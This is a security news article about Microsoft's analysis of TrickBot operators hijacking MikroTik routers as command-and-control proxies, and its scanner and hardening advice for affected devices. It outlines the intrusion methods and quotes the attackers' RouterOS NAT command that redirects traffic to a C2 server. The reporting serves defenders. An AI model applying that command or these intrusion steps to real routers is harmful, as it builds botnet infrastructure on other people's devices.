Microsoft creates tool to scan MikroTik routers for TrickBot infections

Microsoft released a scanner that detects MikroTik routers hacked by the TrickBot gang to act as proxies for command and control servers.

TrickBot is a malware botnet distributed via phishing emails or dropped by other malware that has already infected a device. Once executed, TrickBot will connect to a remote command and control server to receive commands and download further payloads to run on the infected machine.

For years, TrickBot has used IoT devices, such as routers, to act as a proxy between an infected device and command and control servers (C2). These proxies are used to prevent researchers and law enforcement from finding and disrupting their command and control infrastructure.

In a new report by Microsoft, researchers explain how the TrickBot gang targeted vulnerable MikroTik routers using various methods to incorporate them as proxies for C2 communications.

Routing malicious traffic

The TrickBot operations utilized various methods when hacking into MikroTik routers, starting with using default credentials and then performing brute force attacks to guess the password.

If these initial methods did not provide access to the router, the threat actors would attempt to exploit CVE-2018-14847, a critical directory traversal vulnerability that allows unauthenticated, remote attackers to read arbitrary files. Using this vulnerability, the threat actors would steal the 'user.dat' file, which contains the user credentials for the router.

Once they gained access to the device, the threat actors used built-in '/ip', '/system', or '/tool' commands to create a network address translation (NAT) rule that rerouted traffic sent to port 449 on the router to port 80 on a remote command and control server.

/ip firewall nat add chain=dstnat proto=tcp dst-port=449 to-port=80 action=dst-nat to-addresses=[infected device] dst-address=[real C2 address]

Using this IP NAT rule, the C2 servers aren’t directly exposed to threat analysis but still allow communication for infected devices.

As Microsoft underlines, the actors appear to have an in-depth knowledge of the limited functions of the Linux-based OS in MikroTik devices, using custom SSH commands that would make little sense on other devices.

The MikroTik problem

An Eclypsium report highlighted last December that hundreds of thousands of MikroTik routers are still vulnerable to malware botnets, several years after the vendor cautioned about the existence of critical flaws.

Because these devices feature unusually powerful hardware, they are seen as high-value targets by malicious actors, especially those interested in resource-intensive operations such as DDoS attacks.

Although security upgrades have been available for years now, many remain vulnerable to botnet recruitment by exploiting unauthenticated, remote access, and code execution flaws.

The owners of MikroTik devices have been repeatedly urged to upgrade to RouterOS versions newer than 6.45.6 and avoid exposing the WinBox protocol.

"This analysis highlights the importance of keeping IoT devices secure in today’s ever evolving threat environment," Microsoft warns in their report.

Microsoft has now released a forensics tool named 'routeros-scanner' that network admins can use to scan MikroTik devices for signs that it was compromised by TrickBot.

This script will scan MikroTik devices for the following information:

• Get the version of the device and map it to CVEs
• Check for scheduled tasks
• Look for traffic redirection rules
• Look for DNS cache poisoning
• Look for default ports change
• Look for non-default users
• Look for suspicious files
• Look for proxy, socks, and FW rules

Additionally, Microsoft recommends performing the following steps on MikroTik devices to secure them further:

• Change the default password to a strong one
• Block port 8291 from external access
• Change SSH port to something other than the default (22)
• Make sure routers are up to date with the latest firmware and patches
• Use a secure virtual private network (VPN) service for remote access and restrict remote access to the router

TrickBot still alive?

In February 2022, the TrickBot operation was shut down, and developers are now working with the Conti ransomware gang to work on stealthier malware, such as the BazaarBackdoor and Anchor families.

As TrickBot has been disrupted in the past and later launched again, we may see threat actors reviving the operation in the future. Therefore, it is essential to make sure devices are properly secured so they cannot be abused in later campaigns or by other malware groups.

In the meantime, if you are using a MikroTik device, you are advised to use Microsoft's infection scanner as the malicious commands won't be reversed due to the shutdown and could be re-activated in the future.

Microsoft creates tool to scan MikroTik routers for TrickBot infections